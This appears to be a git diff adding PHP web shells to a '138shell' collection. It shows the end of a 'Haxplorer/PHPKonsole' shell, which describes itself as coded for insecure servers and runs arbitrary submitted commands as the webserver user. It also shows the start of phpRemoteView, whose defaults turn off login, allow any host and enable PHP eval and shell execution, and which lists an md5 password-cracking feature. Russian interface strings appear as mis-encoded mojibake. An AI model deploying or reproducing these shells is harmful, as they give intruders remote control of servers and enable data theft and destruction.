+			echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+		    }
+		}
+	    }
+	}
+	closedir($dir_handle);
+	?>
+	</select></td></tr></table>
+	<p>Command: <input class="inputtext" type="text" name="command" size="60">
+	<input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p>
+	<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>></p>
+	<textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php
+	    if (!empty($command)) {
+	        echo "phpKonsole> ". htmlspecialchars($command) . "\n\n"; 
+		if ($stderr) {
+		    $tmpfile = tempnam('/tmp', 'phpshell');
+		    $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile";
+		} else if ($command == 'ls') {
+		    $command .= ' -F';
+		}
+		$output = `$command`;
+		echo htmlspecialchars($output);
+	    }
+	?></textarea>
+    </form>
+																													      
+    <script language="JavaScript" type="text/javascript">
+	document.forms[0].command.focus();
+    </script>
+ </td></tr></table>
+<?php
+}    
+else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
+	$isMainMenu = true;
+     ?>
+	<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	 <tr>
+	  <td width="100%" class="border">
+	   <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
+	  </td>
+	 </tr>
+	</table>
+	<br>
+ 	<center>
+	<table border="0" NOWRAP>
+ 	 <tr>
+	  <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> Haxplorer <==</strong></font>", "cmd=dir&dir=.").sp(2); ?>
+	  </td>
+ 	  <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+	   Haxplorer is a server side file browser wich (ab)uses the directory object to list
+ 	   the files and directories stored on a webserver. This handy tools allows you to manage
+ 	   files and directories on a unsecure server with php support.<br><br>This entire script
+ 	   is coded for unsecure servers, if your server is secured the script will hide commands
+ 	   or will even return errors to your browser...<br><br>
+	  </td>
+	 </tr>
+ 	 <tr>
+	  <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> PHPKonsole <==</strong></font>", "cmd=con").sp(2); ?>
+	  </td>
+ 	  <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+	   <br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver.
+	    When you run commands they will run as the webservers UserID. This should work perfectly
+	    for managing files, like moving, copying etc. If you're using a linux server, system commands
+	    such as ls, mv and cp will be available for you... <br><br>This function will only work if the
+	    server supports php and the execute commands...<br><br>
+	  </td>
+	 </tr>
+        </table>
+	</center>
+	<br>
+     <?php
+}
+
+if ($cmd != "downl") {
+	if ( $isMainMenu != true) {
+ 		?>
+		<table width="100%" border="0" cellpadding="0" cellspacing="0">
+		 <tr>
+		  <td width="100%" style="class="silver border">
+		   <center><strong>
+		    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=");      ?>&nbsp;&nbsp;
+		    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;PHPKonsole&nbsp;] </font>", "cmd=con");        ?>&nbsp;&nbsp;
+                    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Haxplorer&nbsp;]  </font>", "cmd=dir&dir=.");  ?> &nbsp;&nbsp;
+ 		   </strong></center>
+		  </td>
+		 </tr>
+		</table>
+		<br>
+		<?php
+}
+	?>
+	<table width=100% border="0" cellpadding="0" cellspacing="0">
+	 <tr>
+	  <td width="100%" class="silver border">
+	   <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+	  </td>
+	 </tr>
+	</table>
+ 	   </td>
+  </tr>
+ </table>
+
+  <?php
+ }
+
+?>
diff --git a/138shell/P/PHPRemoteView.txt b/138shell/P/PHPRemoteView.txt
new file mode 100644
index 0000000..4d6e436
--- /dev/null
+++ b/138shell/P/PHPRemoteView.txt
@@ -0,0 +1,2553 @@
+<?php
+
+/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+ *
+ *  Welcome to phpRemoteView (RemView) 
+ *
+ *  View/Edit remove file system:
+ *  - view index of directory (/var/log - view logs, /tmp - view PHP sessions)
+ *  - view name, size, owner:group, perms, modify time of files
+ *  - view html/txt/image/session files
+ *  - download any file and open on Notepad
+ *  - create/edit/delete file/dirs
+ *  - executing any shell commands and any PHP-code
+ *
+ *  Free download from http://php.spb.ru/remview/
+ *  Version 04c, 2003-10-23. 
+ *  Please, report bugs...
+ *
+ *  This programm for Unix/Windows system and PHP4 (or higest).
+ *
+ *  (c) Dmitry Borodin, dima@php.spb.ru, http://php.spb.ru
+ *
+ * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * *
+ *
+ * --version4--
+ *  2003.10.23 support short <?php ?> tags, thanks A.Voropay
+ *
+ *  2003.04.22 read first 64Kb of null-size file (example: /etc/zero), 
+ *                thanks Anight
+ *             add many functions/converts: md5, decode md5 (pass crack), 
+ *                date/time, base64, translit, russian charsets
+ *             fix bug: read session files
+ *
+ *  2002.08.24 new design and images
+ *             many colums in panel
+ *             sort & setup panel
+ *             dir tree
+ *             base64 encoding
+ *             character map
+ *             HTTP authentication with login/pass
+ *             IP-address authentication with allow hosts
+ *
+ * --version3--
+ *  2002.08.10 add multi language support (english and russian)
+ *             some update
+ *
+ *  2002.08.05 new: full windows support
+ *             fix some bugs, thanks Jeremy Flinston
+ * 
+ *  2002.07.31 add file upload for create files
+ *             add 'direcrory commands'
+ *             view full info after safe_mode errors
+ *             fixed problem with register_glogals=off in php.ini
+ *             fixed problem with magic quotes in php.ini (auto strip slashes)
+ *
+ * --version2--
+ *  2002.01.20 add panel 'TOOLS': eval php-code and run shell commands
+ *             add panel 'TOOLS': eval php-code and run shell commands
+ *             add copy/edit/create file (+panel 'EDIT')
+ *             add only-read mode (disable write/delete and PHP/Shell)
+ *
+ *  2002.01.19 add delete/touch/clean/wipe file
+ *             add panel 'INFO', view a/c/m-time, hexdump view
+ *             add session file view mode (link 'SESSION').
+ *
+ *  2002.01.12 first version!
+ *
+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
+
+///////////////////////////////// S E T U P ///////////////////////////////////
+
+   
+   $version="2003-10-23";
+
+   $hexdump_lines=8;        // lines in hex preview file
+   $hexdump_rows=24;        // 16, 24 or 32 bytes in one line
+
+   $mkdir_mode=0755;        // chmode for new dir ('MkDir' button)
+
+   $maxsize_fread=65536;    // read first 64Kb from any null-size file
+
+   // USER ACCESS //
+
+   $write_access=true;      // true - user (you) may be write/delete files/dirs
+                            // false - only read access
+
+   $phpeval_access=true;    // true - user (you) may be execute any php-code
+                            // false - function eval() disable
+   
+   $system_access=true;     // true - user (you) may be run shell commands
+                            // false - function system() disable
+   
+   // AUTHORIZATION //
+
+   $login=false;            // Login & password for access to this programm.
+   $pass=false;             // Example: $login="MyLogin"; $pass="MyPaSsWoRd";
+                            // Type 'login=false' for disable authorization.
+
+   $host_allow=array("*");  // Type list of your(allow) hosts. All other - denied.
+                            // Example: $host_allow=array("127.0.0.*","localhost")
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+   $tmp=array();
+   foreach ($host_allow as $k=>$v)
+      $tmp[]=str_replace("\\*",".*",preg_quote($v));
+   $s="!^(".implode("|",$tmp).")$!i";
+   if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) 
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - your host not allow</h1>\n");
+   if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || 
+      $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) {
+      header("WWW-Authenticate: Basic realm=\"phpRemoteView\"");
+      header("HTTP/1.0 401 Unauthorized");
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - password erroneous</h1>\n");
+   }
+
+   error_reporting(2047);
+   set_magic_quotes_runtime(0);
+   @set_time_limit(0);
+   @ini_set('max_execution_time',0);
+   @ini_set('output_buffering',0);
+   if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler");
+
+   $self=basename($HTTP_SERVER_VARS['PHP_SELF']);
+
+   $url="http://".getenv('HTTP_HOST').
+        (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : "").
+        $HTTP_SERVER_VARS['PHP_SELF'].
+        (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : "");
+   $uurl=urlencode($url);
+
+   //
+   // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars;
+   //
+   $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ".
+              "ftype fnot c2 confirm text df df2 df3 df4 ref from to ".
+              "fatt showfile showsize root name ref names sort sortby ".
+              "datetime fontname fontname2 fontsize pan limit convert fulltime fullqty";
+   foreach (explode(" ",$autovars1) as $k=>$v)  {
+      if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v];
+         elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v];
+            //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v];
+   }
+
+   //
+   // autofix 'magic quotes':
+   //
+   $autovars2="php shell text d root convert";
+   if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) {
+      foreach (explode(" ",$autovars2) as $k=>$v) {
+         if (isset($$v)) $$v=stripslashes($$v);
+      }
+   }
+
+   $cp_def=array(
+      "001001",
+      "nst2ac",
+      "d/m/y H:i",
+      "Tahoma",
+      "9"
+      );
+
+   $panel=0;
+   if (isset($HTTP_COOKIE_VARS["cp$panel"])) 
+      $cp=explode("~",$HTTP_COOKIE_VARS["cp$panel"]); 
+   else 
+      $cp=$cp_def;
+   $cc=$cp[0];
+   $cn=$cp[1];
+
+/*
+
+$cc / $cp[0]- ñïèñîê îäíîáóêâåííûõ ïàğàìåòğîâ, ñêîïèğîâàíî â $cs:
+   $cc[0] - ïî êàêîé êîëîíêå ñîğòèğîâàòü, à åñëè ıòî íå öèôğà:
+               n - ïî èìåíè
+               e - ğàñøèğåíèå
+   $cc[1] - ïîğÿäîê (0 - âîçğàñò. 1 - óáûâàşùèé)
+   $cc[2] - ïîêàçûâàòü ëè èêîíêè
+   $cc[3] - ÷òî äåëàòü ïğè êëèêå ïî èêîíêå ôàéëà:
+               0 - ïğîñìîòğ â text/plain
+               1 - ïğîñìîòğ â html
+               2 - download
+               3 - ïàğàìåòğû ôàéëà (info)
+   $cc[4] - îêğóãëÿòü ğàçìåğ ôàéëîâ äî Êá/Ìá/Ãá
+   $cc[5] - ÿçûê:
+               1 - àíãëèéñêèé
+               2 - ğóññêè
+
+$cn / $cp[1] - ñïèñîê êîëîíîê è èõ ïîğÿäîê, êîòîğûå ïîêàçûâàòü, ñòğîêà áóêâ/öèôğ:
+   t - type
+   n - name
+   s - size
+   a - owner+group
+   o - owner
+   g - group
+   c - chmod
+   1 - create time
+   2 - modify time
+   3 - access time
+
+$cp[2]: ôîğìàò âğåìåíè
+
+$cp[3]: èìÿ øğèôòà
+
+$cp[4]: ğàçìåğ øğèôòà
+
+*/
+
+   // Êàê âûğàâíèâàòü êîëîíêè
+   $cn_align=array();
+   $cn_align['t']='center';
+   $cn_align['n']='left';
+   $cn_align['s']='right';
+   $cn_align['a']='center';
+   $cn_align['o']='center';
+   $cn_align['g']='center';
+   $cn_align['c']='center';
+   $cn_align['1']='center';
+   $cn_align['2']='center';
+   $cn_align['3']='center';
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+/*--mmstart--*/
+$mm=array(
+"Index of"=>"Èíäåêñ",
+"View file"=>"Ïîêàç ôàéëà",
+"DISK"=>"ÄÈÑÊ",
+"Info"=>"Èíôî",
+"Plain"=>"Ïğÿìîé",
+"HTML"=>"HTML",
+"Session"=>"Ñåññèÿ",
+"Image"=>"Êàğòèíêà",
+"Notepad"=>"Áëîêíîò",
+"DOWNLOAD"=>"ÇÀÃĞÓÇÈÒÜ",
+"Edit"=>"Ïğàâêà",
+"Sorry, this programm run in read-only mode."=>"Èçâèíèòå, ıòà ïğîãğàììà ğàáîòàåò â ğåæèìå 'òîëüêî ÷òåíèå'.",
+"For full access: write"=>"Äëÿ ïîëíîãî äîñòóïà: íàïèøèòå",
+"in this php-file"=>"â ıòîì php-ôàéëå",
+"Reason"=>"Ïğè÷èíà",
+"Error path"=>"Îøèáî÷íûé ïóòü",
+"Click here for start"=>"Íàæìèòå äëÿ ñòàğòà",
+"up directory"=>"êàòàëîã âûøå",
+"access denied"=>"äîñòóï çàïğåùåí",
+"REMVIEW TOOLS"=>"ÓÒÈËÈÒÛ REMVIEW",
+"version"=>"âåğñèÿ",
+"Free download"=>"Áåñïëàòíàÿ çàãğóçêà",
+"back to directory"=>"âåğíóòüñÿ â êàòàëîã",
+"Size"=>"Ğàçìåğ",
+"Owner"=>"Îâíåğ",
+"Group"=>"Ãğóïïà",
+"FileType"=>"Òèï ôàéëà",
+"Perms"=>"Ïğàâà",
+"Create time"=>"Âğåìÿ ñîçäàíèÿ",
+"Access time"=>"Âğåìÿ äîñòóïà",
+"MODIFY time"=>"Âğåìÿ ÈÇÌÅÍÅÍÈß",
+"HEXDUMP PREVIEW"=>"ÏĞÅÄÏĞÎÑÌÎÒĞ Â 16-ĞÈ×ÍÎÌ ÂÈÄÅ",
+"ONLY READ ACCESS"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ",
+"Can't READ file - access denied"=>"Íå ìîãó ïğî÷èòàòü - äîñòóï çàïğåùåí",
+"full read/write access"=>"ïîëíûé äîñòóï íà ÷òåíèå/çàïèñü",
+"FILE SYSTEM COMMANDS"=>"ÊÎÌÀÍÄÛ ÔÀÉËÎÂÎÉ ÑÈÑÒÅÌÛ",
+"EDIT"=>"ĞÅÄÀÊÒ.",
+"FILE"=>"ÔÀÉË",
+"DELETE"=>"ÑÒÅĞÅÒÜ",
+"Delete this file"=>"Ñòåğåòü ôàéë",
+"CLEAN"=>"Î×ÈÑÒÈÒÜ",
+"TOUCH"=>"ÎÁÍÎÂÈÒÜ",
+"Set current 'mtime'"=>"Óñòàí.òåêóù.âğåìÿ",
+"WIPE(delete)"=>"ÓÍÈ×ÒÎÆÈÒÜ",
+"Write '0000..' and delete"=>"Çàáèòü íóëÿìè, ñòåğåòü",
+"COPY FILE"=>"ÊÎÏÈĞÎÂÀÒÜ ÔÀÉË",
+"COPY"=>"ÊÎÏÈĞÎÂÀÒÜ",
+"MAKE DIR"=>"ÑÎÇÄÀÒÜ ÊÀÒÀËÎÃ",
+"type full path"=>"ââåäèòå ïîëíûé ïóòü",
+"MkDir"=>"Ñîçä.Êàò.",
+"CREATE NEW FILE or override old file"=>"ÑÎÇÄÀÒÜ ÍÎÂÛÉ ÔÀÉË èëè ïåğåçàïèñàòü ñòàğûé",
+"CREATE/OVERRIDE"=>"ÑÎÇÄÀÒÜ/ÏÅĞÅÇÀÏÈÑÀÒÜ",
+"select file on your local computer"=>"âûáğàòü ôàéë íà âàøåì ëîêàëüíîì êîìïüşòåğå",
+"save this file on path"=>"ñîõğàíèòü ıòîò ôàéë â êàòàëîã",
+"create file name automatic"=>"ïğèäóìàòü èìÿ ôàéëó àâòîìàòè÷åñêè",
+"OR"=>"ÈËÈ",
+"type any file name"=>"ââåñòè èìÿ ôàéëà âğó÷íóş",
+"convert file name to lovercase"=>"êîíâåğòèğîâàòü èìÿ â íèæíèé ğåãèñòğ",
+"Send File"=>"Ïîñëàòü ôàéë",
+"Delete all files in dir"=>"Óäàëèòü âñå ôàéëû",
+"Delete all dir/files recursive"=>"Óäàëèòü ÂÑÅ +ïîäêàòàëîãè ğåêóğñèâíî",
+"Confirm not found (go back and set checkbox)"=>"Ïîäòâåğæäåíèå íå ïîñòàâëåíî (âåğíèòåñü íàçàä è ïîñòàâüòå ãàëî÷êó)",
+"Delete cancel - File not found"=>"Óäàëåíèå îòìåíåíî - Ôàéë íå íàéäåí",
+"YES"=>"ÄÀ",
+"ME"=>"ÌÅÍß",
+"NO (back)"=>"ÍÅÒ (íàçàä)",
+"Delete cancel"=>"Óäàëåíèå îòìåíåíî",
+"ACCESS DENIED"=>"ÄÎÑÒÓÏ ÇÀÏĞÅÙÅÍ",
+"done (go back)"=>"ãîòîâî (íàçàä)",
+"Delete ok"=>"Îê, óäàëåííî",
+"Touch cancel"=>"Îáíîâëåíèå îòìåíåíî",
+"Touch ok (set current time to 'modify time')"=>"Îáíîâëåíèå çàâåğøåíî (ôàéëó ïğèñâîåíî òåêóùåå âğåìÿ ìîäèôèêàöèè)",
+"Clean (empty file) cancel"=>"Î÷èùåíèå (îáíóëåíèå ôàéëà) îòìåíåíî",
+"Clean ok (file now empty)"=>"Îê, î÷èùåíî (ôàéë îáíóëåí)",
+"Wipe cancel - access denied"=>"Óíè÷òîæåíèå îòìåíåíî - äîñòóï çàïğåùåí",
+"Wipe ok (file deleted)"=>"Îê, óíè÷òîæåíî (è ôàéë ñòåğò)",
+"DIR"=>"DIR",
+"Deleting all files in"=>"Óäàëåíèå âñåõ ôàéëîâ â",
+"skip"=>"ïğîïóñê",
+"deleting"=>"óäàëåíèå",
+"Deleting all dir/files (recursive) in"=>"Óäàëåíèå âñåõ ôàéëîâ/ïîäêàòàëîãîâ (ğåêóğñèâíî)",
+"DONE, go back"=>"ÃÎÒÎÂÎ, íàçàä",
+"DONE"=>"ÃÎÒÎÂÎ",
+"file not found"=>"ôàéë íå íàéäåí",
+"ONLY READ ACCESS (don't edit!)"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ (íå ğåäàêòèğîâàòü)",
+"Can't READ file - access denied (don't edit!)"=>"Íå ìîãó ×ÈÒÀÒÜ ôàéë - äîñòóï çàïğåùåí",
+"EDIT FILE"=>"ÏĞÀÂÈÒÜ ÔÀÉË",
+"can't open, access denied"=>"íå ìîãó îòêğûòü, äîñòóï çàïğåùåí",
+"SAVE FILE (write to disk)"=>"ÑÎÕĞÀÍÈÒÜ ÔÀÉË (çàïèñü íà äèñê)",
+"You mast checked 'create file name automatic' OR typed file name!"=>"Âû äîëæíû îòìåòèòü ãàëî÷êó [ñîçäàòü ôàéë àâòîìàòè÷åñêè] èëè ââåñòè â ïîëå èìÿ ôàéëà!'",
+"SAVING TO"=>"ÑÎÕĞÀÍÈÒÜ Â",
+"Sorry, access denied"=>"Èçâèíèòå, äîñòóï çàïğåùåí",
+"for example, uncomment next line"=>"äëÿ ïğèìåğà, ğàñêîììåíòèğóéòå ñëåäóşùóş ñòğîêó",
+"Eval PHP code"=>"Âûïîëíèòü PHP êîä",
+"don't type"=>"íå ïèøèòå",
+"and"=>"è",
+"example (remove comments '#')"=>"ïğèìåğ (óäàëèòå êîììåíòàğèè '#')",
+"Shell commands"=>"Êîìàíäû Shell'a",
+"filesize to 0byte"=>"ğàçìåğ â 0 áàéò",
+"from"=>"îò",
+"to"=>"â",
+"Full file name"=>"Ïîëíîå èìÿ ôàéëà",
+"Can't open directory"=>"Íå ìîãó îòêğûòü êàòàëîã",
+"setup"=>"íàñòğîéêà",
+"back"=>"íàçàä",
+"Reset all settings"=>"Ñáğîñèòü âñå íàñòğîéêè",
+"clear"=>"î÷èñòèòü",
+"Current"=>"Òåêóùèå",
+"Colums and sort"=>"Êîëîíêè è ñîğòèğîâêà",
+"Sort order"=>"Ïîğÿäîê ñîğòèğîâêè",
+"Ascending sort"=>"Ïî âîçğàñòàíèş",
+"Descending sort"=>"Ïî óáûâàíèş",
+"Sort by filename"=>"Ñîğòèğîâàòü ïî èìåíè ôàéëà",
+"Sort by filename extension"=>"Ñîğòèğîâàòü ïî ğàñøèğåíèş ôàéëà",
+"Date/time format"=>"Ôîğìàò äàòû/âğåìåíè",
+"Panel font & size"=>"Øğèôò/ğàçìåğ ïàíåëè",
+"Setup"=>"Îïöèè",
+"Char map"=>"Ñèìâîëû",
+"Language"=>"ßçûê",
+"English"=>"Àíãëèéñêèé",
+"Russian"=>"Ğóññêèé",
+"Character map (symbol codes table)"=>"Òàáëèöà ñèìâîëîâ",
+"Select font"=>"Âûáåğèòå øğèôò",
+"or type other"=>"èëè ââåäèòå äğóãîé",
+"Font size"=>"Ğàçìåğ øğèôòà",
+"Code limit"=>"Äèïàçîí êîäîâ",
+"Generate table"=>"Ñãåíåğèğîâàòü òàáëèöó",
+"Universal convert"=>"Óíèâåğñàëüíûå êîíâåğòàöèè"
+);/*--mmstop--*/
+
+
+
+
+   $language=$cc[5];
+   if ($language!=1 && $language!=2) $language=1;
+
+
+function mm($m) {
+   global $mm,$language;
+   if ($language==1) return $m;
+   if (isset($mm[$m])) return $mm[$m];
+   else echo "<script>alert('(mm) msg not found: $m');</script>";
+}
+
+
+switch ($language) {
+case 1:
+$cn_name=array(
+'t'=>"Type",
+'n'=>"Name",
+'s'=>"Size",
+'o'=>"Owner",
+'g'=>"Group",
+'a'=>"Owner/Group",
+'c'=>"Perms",
+'1'=>"Create",
+'2'=>"Modify",
+'3'=>"Access"
+);
+break;
+case 2:
+$cn_name=array(
+'t'=>"Òèï",
+'n'=>"Èìÿ",
+'s'=>"Ğàçìåğ",
+'o'=>"Âëàäåëåö",
+'g'=>"Ãğóïïà",
+'a'=>"Âëàäåëåö/Ãğóïïà",
+'c'=>"Ïğàâà",
+'1'=>"Ñîçäàí",
+'2'=>"Èçìåíåí",
+'3'=>"Äîñòóï"
+);
+break;
+}
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+
+   $rand=microtime();
+
+   if (!isset($c)) $c="";
+   if (!isset($d)) $d="";
+   if (!isset($f)) $f="";
+
+   ob();
+   $d=str_replace("\\","/",$d);
+   if ($d=="") $d=realpath("./")."/";
+   if ($c=="") $c="l";
+   if ($d[strlen($d)-1]!="/") $d.="/";
+   $d=str_replace("\\","/",$d);
+   if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." <tt><font color=red><big>$d</big></font></tt>$obb");
+   if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb");
+   obb();
+
+   //
+   // OS detect:
+   //
+   $win=0;
+   $unix=0;
+   if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1;
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+$html=<<<remview
+<html><head>
+<title>phpRemoteView: $d$f</title>
+</head>
+<body>
+<style>
+A {
+text-decoration : none;
+}
+.t {
+font-size: 9pt;
+text-align : center;
+font-family: Verdana;
+}
+.t2 {
+font-size: 8pt;
+text-align : center;
+font-family: Verdana;
+}
+.n {
+  font-family: Fixedsys
+}
+.s {
+font-size: 10pt;
+text-align : right;
+font-family: Verdana;
+}
+.sy {
+font-family: Fixedsys;
+}
+.s2 {
+font-family: Fixedsys;
+color: red;
+}
+.tab {
+font-size: 10pt;
+text-align : center;
+font-family: Verdana;
+background: #cccccc;
+}
+.tr {
+background: #ffffff;
+}
+</style>
+remview;
+
+
+
+function display_perms($mode) 
+{ 
+if ($GLOBALS['win']) return 0;
+/* Determine Type */ 
+if( $mode & 0x1000 ) 
+$type='p'; /* FIFO pipe */ 
+else if( $mode & 0x2000 ) 
+$type='c'; /* Character special */ 
+else if( $mode & 0x4000 ) 
+$type='d'; /* Directory */ 
+else if( $mode & 0x6000 ) 
+$type='b'; /* Block special */ 
+else if( $mode & 0x8000 ) 
+$type='-'; /* Regular */ 
+else if( $mode & 0xA000 ) 
+$type='l'; /* Symbolic Link */ 
+else if( $mode & 0xC000 ) 
+$type='s'; /* Socket */ 
+else 
+$type='u'; /* UNKNOWN */ 
+
+/* Determine permissions */ 
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+
+/* Adjust for SUID, SGID and sticky bit */ 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function _posix_getpwuid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getpwuid($x);
+}
+
+function _posix_getgrgid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getgrgid($x);
+}
+
+function up($d,$f="",$name="") {
+   global $self,$win;
+
+   $len=strlen($d."/".$f);
+   if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; }
+   elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";}
+   else {$sf1="<font size=2>"; $sf2="<font size=3>";}
+
+   echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td 
+   bgcolor=#cccccc> $sf1";
+
+   $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>";
+   echo $home.$sf2."<b>";
+   if ($name!="") echo $name;
+   else {
+      if ($f=="") echo mm("Index of"); 
+      else echo mm("View file");
+   }
+   echo "</b></font> ";
+   
+   $path=explode("/",$d);
+
+   $rootdir="/";
+   if ($win) $rootdir=strtoupper(substr($d,0,2))."/";
+
+   $ss="";
+   for ($i=0; $i<count($path)-1; $i++) {
+      if ($i==0) 
+         $comm="<b>&nbsp;&nbsp;<big><b>$rootdir</b></big></b>"; 
+      else 
+         $comm="$path[$i]<big><b>/</big></b>";
+    
+      $ss.=$path[$i]."/";
+      echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>";
+      if ($i==0 && $d=="/") break;
+   }
+   echo "</font>";
+   if ($f!="") echo "$sf1$f</font>";
+
+   if ($win && strlen($d)<4 && $f=="") {
+      echo " &nbsp; ".mm("DISK").": ";
+      for ($i=ord('a'); $i<=ord('z'); $i++) {
+         echo "<a href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> ";
+      }   
+   }
+
+   echo "</b></big></td><td bgcolor=#999999 width=1% align=center>
+   <table width=100% border=0 cellspacing=3 cellpadding=0 
+   bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a 
+   href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b>
+   </nobr></font></td></tr></table>
+   </td></tr></table>";
+}
+
+
+function up_link($d,$f) {
+   global $self;
+   $notepad=str_replace(".","_",$f).".txt";
+echo "<small>
+[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>]
+[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>]
+[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>]
+[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>]
+</small>";
+}
+
+
+function exitw() {
+exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd>
+<tr><td align=center>
+".mm("Sorry, this programm run in read-only mode.")."<br>
+".mm("For full access: write")." `<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>` 
+".mm("in this php-file").".</td></tr></table>
+");
+}
+
+
+
+function ob() {
+   global $obb_flag, $obb;
+   if (!isset($obb_flag)) { $obb_flag=0; $obb=false; }
+   if (function_exists("ob_start")) {
+      if ($GLOBALS['obb_flag']) ob_end_clean();
+      ob_start();
+      $GLOBALS['obb_flag']=1;
+   }
+}
+
+function obb() {
+   global $obb;
+   if (function_exists("ob_start")) {
+      $obb=ob_get_contents();
+      ob_end_clean();
+      $obb="<P>
+<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td>
+<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center>
